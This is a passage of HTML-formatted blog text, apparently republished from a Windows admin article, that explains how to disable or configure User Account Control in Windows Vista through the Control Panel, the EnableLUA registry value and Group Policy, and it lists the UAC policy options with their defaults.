&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a class="external" href="http://i.i.com.com/cnwk.1d/i/tr/contentPics/b_msconfig.jpg" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;img alt="windows Vista user access control UAC - The Ethical Hacking" src="http://i.i.com.com/cnwk.1d/i/tr/contentPics/b_msconfig.jpg" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-style: initial; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; margin-bottom: 5px; margin-left: 0px; margin-right: 10px; margin-top: 0px; padding-bottom: 2px; padding-left: 2px; padding-right: 2px; padding-top: 2px;" title="windows Vista user access control UAC - The Ethical Hacking" /&gt;&lt;/a&gt;&lt;br /&gt;
The System Configuration window Tools tab.&lt;br /&gt;
&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" /&gt;Disable User Access Control via the Control Panel&lt;/strong&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;If you have just a couple of machines, the easiest way to disable User Access Control is to disable the feature via the Control Panel. Follow these steps to achieve this goal:&lt;/div&gt;&lt;/div&gt;&lt;ol style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Go to Start | Control Panel.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Viewing the Control Panel in “Classic” mode, choose the User Accounts applet. This opens the screen shown below in Figure.&lt;/li&gt;
&lt;/ol&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a class="external" href="http://i.i.com.com/cnwk.1d/i/tr/contentPics/c_cp1.jpg" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;img alt="windows Vista user access control UAC - The Ethical Hacking" src="http://i.i.com.com/cnwk.1d/i/tr/contentPics/c_cp1.jpg" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-style: initial; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; margin-bottom: 5px; margin-left: 0px; margin-right: 10px; margin-top: 0px; padding-bottom: 2px; padding-left: 2px; padding-right: 2px; padding-top: 2px;" title="windows Vista user access control UAC - The Ethical Hacking" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;The User Accounts control panel applet.&lt;/div&gt;&lt;/div&gt;&lt;ol style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Choose the “Turn User Account Control on or off” option. Note that this applet has a little shield next to it. This shield indicates that this function is itself protected by User Account Control.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Deselect the checkbox next to Use User Account Control (UAC) To Help Protect Your Computer. See Figure D.&lt;/li&gt;
&lt;/ol&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Figure D&lt;br /&gt;
&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a class="external" href="http://i.i.com.com/cnwk.1d/i/tr/contentPics/d_cp2.jpg" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;img alt="windows Vista user access control UAC - The Ethical Hacking" src="http://i.i.com.com/cnwk.1d/i/tr/contentPics/d_cp2.jpg" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-style: initial; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; margin-bottom: 5px; margin-left: 0px; margin-right: 10px; margin-top: 0px; padding-bottom: 2px; padding-left: 2px; padding-right: 2px; padding-top: 2px;" title="windows Vista user access control UAC - The Ethical Hacking" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;The User Accounts control panel applet.&lt;/div&gt;&lt;/div&gt;&lt;ol style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Press OK.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Reboot your computer for the changes to take effect.&lt;/li&gt;
&lt;/ol&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Disable User Access Control via the Registry Editor&lt;br /&gt;
[eminimall]&lt;br /&gt;
A second way to disable User Access Control involves the use of the registry editor. By changing a specific key on each Vista machine, you can disable User Access Control. Here are the steps:&lt;br /&gt;
&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;ol style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Start the Registry Editor.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Browse to the following key:&amp;nbsp;&lt;em style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;HKEY_LOCAL_MACHINE Software Microsoft Windows CurrentVersion Policies System&lt;/em&gt;.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Change the value of the EnableLUA entry to “0″ If you ever want to re-enable User Access Control, follow these instructions, but change the value of the EnableLUA entry to “1″. See Figure E for a look at the screen.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;When you are done, reboot the computer for the change to take effect.&lt;/li&gt;
&lt;/ol&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Figure E&lt;br /&gt;
&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a class="external" href="http://i.i.com.com/cnwk.1d/i/tr/contentPics/e_registry.jpg" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;img alt="windows Vista user access control UAC - The Ethical Hacking" src="http://i.i.com.com/cnwk.1d/i/tr/contentPics/e_registry.jpg" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-style: initial; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; margin-bottom: 5px; margin-left: 0px; margin-right: 10px; margin-top: 0px; padding-bottom: 2px; padding-left: 2px; padding-right: 2px; padding-top: 2px;" title="windows Vista user access control UAC - The Ethical Hacking" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;The EnableLUA key in the Registry Editor.&lt;/div&gt;&lt;/div&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Manage/Disable User Access Control via Group Policy&lt;br /&gt;
&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;If you have a lot of computers and you want to change User Access Control behavior across all of them, your best bet is to use Group Policy. The Group Policy method is also the most granular of the bunch and allows you to set a variety of parameter related to User Access Control. I’ll show you how to accomplish this using the local group policy administrative tool.&lt;/div&gt;&lt;/div&gt;&lt;ol style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Go to Start | All Programs | Accessories | Run.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;In the Run box, type “secpol.msc” and press [Enter].&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;When User Account Control asks for permission to continue, press the Continue button.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Browse to Computer Configuration | Windows Settings | Security Settings | Local Policies | Security Options. You’ll see the screen shown in Figure F.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Select the group policy object you wish to modify and change the setting to the desired value. The list below provides you with a look at all of the group policy settings associated with User Access Control.&lt;/li&gt;
&lt;/ol&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Figure F&lt;br /&gt;
&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a class="external" href="http://i.i.com.com/cnwk.1d/i/tr/contentPics/f_gpoe-1.jpg" rel="nofollow" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;&lt;img alt="windows Vista user access control UAC - The Ethical Hacking" src="http://i.i.com.com/cnwk.1d/i/tr/contentPics/f_gpoe-1.jpg" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-style: initial; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; margin-bottom: 5px; margin-left: 0px; margin-right: 10px; margin-top: 0px; padding-bottom: 2px; padding-left: 2px; padding-right: 2px; padding-top: 2px;" title="windows Vista user access control UAC - The Ethical Hacking" /&gt;&lt;/a&gt;&lt;br /&gt;
The Group Policy Object Editor.&lt;/div&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;There are a number of options related to User Access Control:&lt;/div&gt;&lt;/div&gt;&lt;ul style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;User Account Control: Behavior of the elevation prompt for the built-in Administrator account — This setting determines the behavior of User Access Control when used with the built-in Administrator account.&lt;ul style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Enabled: When running an application that needs administrative rights, the built-in Administrator account will be subject to User Access Control.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Disabled (default): The built-in Administrator account will run all applications without further prompting.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;User Account Control: of the elevation prompt for administrators in Admin Approval Mode — This setting determines what takes place when administrators (besides the built-in Administrator account) run a privileged application.&lt;ul style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Elevate without prompting: This is the most dangerous setting and should be used only in very secure environments. Restricted applications are run with administrative rights without intervention.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Prompt for credentials: The user is prompted to provide the user name and password for a user with local administrative rights.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Prompt for consent (default): This is the normal behavior for User Access Control and asks the user (assuming the user has administrative rights) to permit or deny running an application with administrative rights.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;User Account Control: Behavior of the elevation prompt for standard users — This setting determines what takes place when standard users try to run a privileged application.&lt;ul style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Prompt for credentials (Default for Home editions): The user is prompted to provide the user name and password for a user with local administrative rights.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Automatically deny elevation requests (Default for Enterprise editions): The user will receive a message indicating that access to the application has been denied.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;User Account Control: Detect application installations and prompt for elevation — How will the User Access Control system respond to requests for the installation of new programs?&lt;ul style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Enabled (Default for home): Application installations that require administrative privileges will trigger the User Access Control prompt.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Disabled (Default for enterprise): Since many application installations are handled via Group Policy, user intervention and approval is not necessary.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;User Account Control: Only elevate executables that are signed and validated — Do elevated applications require a valid PKI certificate chain?&lt;ul style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Enabled: Requires that an application has a valid PKI certificate chain before it is allowed to run.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Disabled (default): Does not require that an application be signed in order to run.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;User Account Control: Only elevate UIAccess applications that are installed in secure location — Applications that request execution with a UIAccess integrity level must reside in a secure area of the system.&lt;ul style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Enabled (default): An application with UIAccess integrity with launch only if it resides in a protected area of the system.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Disabled: An application with UIAccess integrity will launch regardless of the location of the executable.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;User Account Control: Run all administrators in Admin Approval Mode — Run all users, including administrators, as standard users. This effectively enables or disables User Access Control. If you change this setting, you must reboot the system.&lt;ul style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Enabled (default): Administrative Approval Mode and User Access Control is enabled.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Disabled: Disable User Access Control and Admin Approval Mode.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;User Account Control: Switch to the secure desktop when prompting for elevation — When User Access Control is enabled and displays an elevation prompt, change Windows Vista to the secure desktop as opposed to the standard user’s desktop.&lt;ul style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Enabled (default): Elevation requests are directed to a secure desktop.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Disabled: Elevation requests are directed to the standard desktop.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;User Account Control: Virtualize file and registry write failures to per-user locations — This setting enables the redirection of legacy application write failures to defined locations in both the registry and file system, mitigating those applications that historically ran as administrator and wrote runtime application data back to&amp;nbsp;&lt;em style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;%ProgramFiles%&lt;/em&gt;,&amp;nbsp;&lt;em style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;%Windir%&lt;/em&gt;;&amp;nbsp;&lt;em style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;%Windir%\system32&lt;/em&gt;&amp;nbsp;or&amp;nbsp;&lt;em style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;HKLM\Software\&lt;/em&gt;. In short, this key helps to maintain backward compatibility with legacy applications that do not like to run as a standard user.&lt;ul style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Enabled (default): Applications writing data to protected areas will be redirected to other locations.&lt;/li&gt;
